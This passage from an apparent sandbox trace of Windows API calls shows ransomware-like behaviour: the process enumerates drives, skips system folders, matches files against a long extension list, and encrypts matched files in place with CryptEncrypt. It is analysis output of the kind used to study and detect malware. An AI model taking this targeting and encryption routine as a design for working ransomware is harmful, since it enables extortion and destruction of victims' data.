WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.641] PathCombineW (in: pszDest=0x31cf670, pszDir="C:\\", pszFile="bootmgr" | out: pszDest="C:\\bootmgr") returned="C:\\bootmgr" [0019.641] PathFindExtensionW (pszPath="bootmgr") returned="" [0019.641] FindNextFileW (in: hFindFile=0x3682b0, lpFindFileData=0x31cf420 | out: lpFindFileData=0x31cf420) returned 1 [0019.641] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.641] PathCombineW (in: pszDest=0x31cf670, pszDir="C:\\", pszFile="BOOTSECT.BAK" | out: pszDest="C:\\BOOTSECT.BAK") returned="C:\\BOOTSECT.BAK" [0019.641] PathFindExtensionW (pszPath="BOOTSECT.BAK") returned=".BAK" [0019.641] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".BAK.") returned=".bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0019.641] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31cf3f4 | out: phKey=0x31cf3f4*=0x3682f0) returned 1 [0019.665] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0019.665] CryptDestroyKey (hKey=0x3682f0) returned 1 [0019.665] FindNextFileW (in: hFindFile=0x3682b0, lpFindFileData=0x31cf420 | out: lpFindFileData=0x31cf420) returned 1 [0019.665] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.665] PathCombineW (in: pszDest=0x31cf670, pszDir="C:\\", pszFile="Config.Msi" | out: pszDest="C:\\Config.Msi") returned="C:\\Config.Msi" [0019.665] StrStrIW (lpFirst="C:\\Config.Msi", lpSrch="\\Windows") returned 0x0 [0019.665] StrStrIW (lpFirst="C:\\Config.Msi", lpSrch="\\Program Files") returned 0x0 [0019.665] StrStrIW (lpFirst="C:\\Config.Msi", lpSrch="\\ProgramData") returned 0x0 [0019.665] StrStrIW (lpFirst="C:\\Config.Msi", lpSrch="\\AppData") returned 0x0 [0019.665] PathCombineW (in: pszDest=0x31cf1f0, pszDir="C:\\Config.Msi", pszFile="*" | out: pszDest="C:\\Config.Msi\\*") returned="C:\\Config.Msi\\*" [0019.665] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 0x3682f0 [0019.665] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.665] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.665] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.665] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 0 [0019.666] FindClose (in: hFindFile=0x3682f0 | out: hFindFile=0x3682f0) returned 1 [0019.666] FindNextFileW (in: hFindFile=0x3682b0, lpFindFileData=0x31cf420 | out: lpFindFileData=0x31cf420) returned 1 [0019.666] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.666] PathCombineW (in: pszDest=0x31cf670, pszDir="C:\\", pszFile="Documents and Settings" | out: pszDest="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0019.666] PathFindExtensionW (pszPath="Documents and Settings") returned="" [0019.666] FindNextFileW (in: hFindFile=0x3682b0, lpFindFileData=0x31cf420 | out: lpFindFileData=0x31cf420) returned 1 [0019.666] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.666] PathCombineW (in: pszDest=0x31cf670, pszDir="C:\\", pszFile="hiberfil.sys" | out: pszDest="C:\\hiberfil.sys") returned="C:\\hiberfil.sys" [0019.666] PathFindExtensionW (pszPath="hiberfil.sys") returned=".sys" [0019.666] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".sys.") returned 0x0 [0019.666] FindNextFileW (in: hFindFile=0x3682b0, lpFindFileData=0x31cf420 | out: lpFindFileData=0x31cf420) returned 1 [0019.666] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.666] PathCombineW (in: pszDest=0x31cf670, pszDir="C:\\", pszFile="MSOCache" | out: pszDest="C:\\MSOCache") returned="C:\\MSOCache" [0019.666] StrStrIW (lpFirst="C:\\MSOCache", lpSrch="\\Windows") returned 0x0 [0019.666] StrStrIW (lpFirst="C:\\MSOCache", lpSrch="\\Program Files") returned 0x0 [0019.666] StrStrIW (lpFirst="C:\\MSOCache", lpSrch="\\ProgramData") returned 0x0 [0019.666] StrStrIW (lpFirst="C:\\MSOCache", lpSrch="\\AppData") returned 0x0 [0019.666] PathCombineW (in: pszDest=0x31cf1f0, pszDir="C:\\MSOCache", pszFile="*" | out: pszDest="C:\\MSOCache\\*") returned="C:\\MSOCache\\*" [0019.666] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 0x3682f0 [0019.666] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.666] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.666] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.666] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.666] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.666] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\MSOCache", pszFile="All Users" | out: pszDest="C:\\MSOCache\\All Users") returned="C:\\MSOCache\\All Users" [0019.666] StrStrIW (lpFirst="C:\\MSOCache\\All Users", lpSrch="\\Windows") returned 0x0 [0019.666] StrStrIW (lpFirst="C:\\MSOCache\\All Users", lpSrch="\\Program Files") returned 0x0 [0019.666] StrStrIW (lpFirst="C:\\MSOCache\\All Users", lpSrch="\\ProgramData") returned 0x0 [0019.666] StrStrIW (lpFirst="C:\\MSOCache\\All Users", lpSrch="\\AppData") returned 0x0 [0019.667] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\MSOCache\\All Users", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\*") returned="C:\\MSOCache\\All Users\\*" [0019.667] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.668] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.668] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.668] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.668] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.668] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.668] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-0016-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C" [0019.668] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0019.668] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0019.668] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0019.668] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0019.668] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*" [0019.668] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0019.669] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.669] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0019.669] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.669] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0019.669] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.669] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", pszFile="ExcelLR.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" [0019.669] PathFindExtensionW (pszPath="ExcelLR.cab") returned=".cab" [0019.669] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0019.669] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0019.669] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0019.670] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=16972987) returned 1 [0019.670] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x102fcdd, lpName=0x0) returned 0x230 [0019.670] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0019.670] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1020000, dwNumberOfBytesToMap=0xfcbb) returned 0xa0000 [0019.672] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0019.673] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1000000) returned 0x3240000 [0019.674] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31ce070*=0x1000000, dwBufLen=0x102fcbb | out: pbData=0x3240000*, pdwDataLen=0x31ce070*=0x1000000) returned 1 [0020.061] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0x1000000) returned 1 [0020.224] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0020.332] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0020.332] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1020000, dwNumberOfBytesToMap=0xfcdd) returned 0xa0000 [0020.334] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0020.334] CryptHashData (hHash=0x368430, pbData=0xafcb7, dwDataLen=0x4, dwFlags=0x0) returned 1 [0020.334] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0020.334] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0020.334] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0xfcdd) returned 1 [0020.335] LocalFree (hMem=0x36ea40) returned 0x0 [0020.335] CryptDestroyHash (hHash=0x368430) returned 1 [0020.335] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0020.335] CloseHandle (hObject=0x230) returned 1 [0020.335] CloseHandle (hObject=0x22c) returned 1 [0020.521] CryptDestroyKey (hKey=0x3683b0) returned 1 [0020.521] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0020.521] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0020.521] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", pszFile="ExcelMUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" [0020.521] PathFindExtensionW (pszPath="ExcelMUI.msi") returned=".msi" [0020.521] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0020.521] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0020.521] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0020.521] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", pszFile="ExcelMUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" [0020.521] PathFindExtensionW (pszPath="ExcelMUI.xml") returned=".xml" [0020.521] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0020.521] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0020.521] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0020.521] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1565) returned 1 [0020.521] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x642, lpName=0x0) returned 0x230 [0020.521] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0020.521] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61d) returned 0xa0000 [0020.523] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0020.523] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61d) returned 0xa0000 [0020.524] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000, pdwDataLen=0x31ce070*=0x61d, dwBufLen=0x620 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x620) returned 1 [0020.524] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x620) returned 1 [0020.525] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0020.525] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0020.525] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x642) returned 0xa0000 [0020.526] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0020.526] CryptHashData (hHash=0x368430, pbData=0xa061c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0020.526] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0020.526] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0020.526] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x642) returned 1 [0020.526] LocalFree (hMem=0x36ea40) returned 0x0 [0020.526] CryptDestroyHash (hHash=0x368430) returned 1 [0020.526] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0020.526] CloseHandle (hObject=0x230) returned 1 [0020.526] CloseHandle (hObject=0x22c) returned 1 [0020.527] CryptDestroyKey (hKey=0x3683b0) returned 1 [0020.527] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0020.527] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0020.527] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" [0020.527] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0020.527] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0020.527] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0020.527] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0020.529] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=2296) returned 1 [0020.529] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x922, lpName=0x0) returned 0x230 [0020.529] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0020.529] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8f8) returned 0xa0000 [0020.530] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0020.531] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8f8) returned 0xa0000 [0020.531] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000, pdwDataLen=0x31ce070*=0x8f8, dwBufLen=0x900 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x900) returned 1 [0020.531] FlushViewOfFile (lpBaseAddress=0xa0000, 